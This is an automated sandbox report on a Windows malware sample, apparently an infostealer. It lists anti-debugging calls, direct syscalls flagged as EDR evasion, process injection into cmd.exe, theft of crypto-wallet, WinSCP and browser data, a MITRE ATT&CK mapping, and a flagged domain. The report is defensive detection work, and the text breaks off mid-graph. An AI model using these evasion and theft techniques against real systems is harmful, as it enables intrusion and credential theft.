Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37D82F mov eax, dword ptr fs:[00000030h]2_2_6D37D82F
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3772E9 mov eax, dword ptr fs:[00000030h]2_2_6D3772E9
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0086394F GetProcessHeap,RtlAllocateHeap,0_2_0086394F
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0088E3D8
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088E88A
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088E9DC SetUnhandledExceptionFilter,0_2_0088E9DC
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00893C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00893C76
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_005EE3D8
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005EE88A
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EE9DC SetUnhandledExceptionFilter,2_2_005EE9DC
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005F3C76
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D370C6C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D370C6C
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D373EDE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D373EDE
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3703FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D3703FB
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_0012762E IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_0012762E

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5DA7D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5B25CFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5B1CB2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D6778C5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7254D1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D675D05Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D722F76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D67E136Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateValueKey: Direct from: 0x7FF70D667C37Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF70D72325DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtTerminateProcess: Direct from: 0x7FF70D5BDDD8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D531ECFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D68BF93Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5D2253Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtOpenKeyEx: Direct from: 0x7FF70D5D97BDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF70D5241F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D67C1A6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D726770Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5B8D09Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5BA90DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52991DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D570B0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5AD940Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D5A4EF6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D62E8B9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D5CE50BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D67DCDBJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeNtSetInformationThread: Direct from: 0x6D4E2240Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D677B98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5BF369Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5ADD22Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D687244Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52FD88Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D6871BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D6780A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D677162Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5C5002Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5D9DFEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5B838AJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeNtQuerySystemInformation: Direct from: 0x777563E1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D680B0DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D676AA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CE826A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D654901Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D6A12F9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D6A26F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52B119Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D523E52Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF70D5B8C13Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D65135DJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52C9FFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D5BFBFD
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D630DADJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7279C3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryVolumeInformationFile: Direct from: 0x7FF70D5C7ED6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D699ED7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5DAAD6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D5A4E3AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D67DC50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D676C69Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5BF270Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF70D63B277Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF70D5B82AAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationThread: Direct from: 0x7FF70D7309E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7279D7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D6833DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D6850CBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D6D81ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5C02F7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D68E1F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5D9EEDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF70D7254B3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7279E5
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D53187AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D69DB35Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D6AB31AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5D03E6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5B7F4BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D726342Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5BF9FFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D609090Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF70D523FB7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x7FF70D5B8D66Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF70D6D6783Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D539E98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52F9FDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5C7185Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D606678Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5D0C30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5D6EEDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5CB96CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D67DACFJump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 227010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 3AC010Jump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552 Jump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_008A1719
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A3A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_008A3A5F
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088EC07 cpuid 0_2_0088EC07
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00874EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_00874EDF
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FEC6 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection,0_2_0089FEC6
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008661DF GetUserNameW,GetLastError,0_2_008661DF
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_008A887B
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00865195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_00865195
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Native API		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		12
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Command and Scripting Interpreter		1
Windows Service		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Credentials in Registry		1
Account Discovery		Remote Desktop Protocol11
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		Logon Script (Windows)1
Access Token Manipulation		3
Obfuscated Files or Information		Security Account Manager13
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Windows Service		1
Software Packing		NTDS137
System Information Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script213
Process Injection		11
DLL Side-Loading		LSA Secrets231
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials3
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading		DCSync11
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Virtualization/Sandbox Evasion		Proc Filesystem1
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron213
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585283 Sample: LVkAi4PBv6.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 86 time.windows.com 2->86 88 tataragirld.site 2->88 112 Antivirus detection for URL or domain 2->112 114 Multi AV Scanner detection for dropped file 2->114 116 Multi AV Scanner detection for submitted file 2->116 118 AI detected suspicious sample 2->118 13 LVkAi4PBv6.exe 3 2->13         started        16 AdobeSync.exe 1 2->16         started        19 msedge.exe 2->19         started        signatures3 process4 dnsIp5 84 C:\Windows\Temp\...\LVkAi4PBv6.exe, PE32 13->84 dropped 22 LVkAi4PBv6.exe 15 13->22         started        102 Maps a DLL or memory area into another process 16->102 25 cmd.exe 2 16->25         started        90 192.168.2.7, 138, 443, 49323 unknown unknown 19->90 92 239.255.255.250 unknown Reserved 19->92 28 msedge.exe 19->28         started        31 msedge.exe 19->31         started        33 msedge.exe 19->33         started        35 msedge.exe 19->35         started        file6 signatures7 process8 dnsIp9 74 C:\Windows\Temp\...\sqlite.dll, PE32 22->74 dropped 76 C:\Windows\Temp\...\Quadruple.dll, PE32 22->76 dropped 78 C:\Windows\Temp\...\BIB.dll, PE32 22->78 dropped 82 4 other files (2 malicious) 22->82 dropped 37 AdobeSync.exe 9 22->37         started        80 